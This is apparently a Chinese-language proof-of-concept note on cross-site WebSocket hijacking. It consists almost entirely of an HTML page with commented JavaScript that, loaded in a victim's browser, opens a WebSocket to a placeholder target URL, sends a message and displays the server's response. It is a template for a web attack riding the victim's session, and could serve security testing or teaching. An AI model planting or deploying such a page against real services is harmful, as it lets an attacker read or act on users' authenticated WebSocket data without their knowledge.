websock跨域劫持
poc:
<meta charset="utf-8">
<script>
function ws_attack(){//自定义函数ws_attack
//定义函数功能
//创建WebSocket并赋值给ws变量
var ws = new WebSocket("url");//如果请求的Websocket服务仅支持HTTP就写成ws://,如果请求的Websocket服务支持HTTPs就写成wss://
ws.onopen = function(evt) {
//当ws(WebSocket)处于连接状态时执行
ws.send("test websocket"); };
ws.onmessage = function(evt)
{ //当ws(WebSocket)请求有响应信息时执行
alert(evt.data)
//注意:响应的信息可以通过evt.data获取!例如:alert(evt.data);
ws.close();
}; }
ws_attack();
//执行ws_attact函数
</script>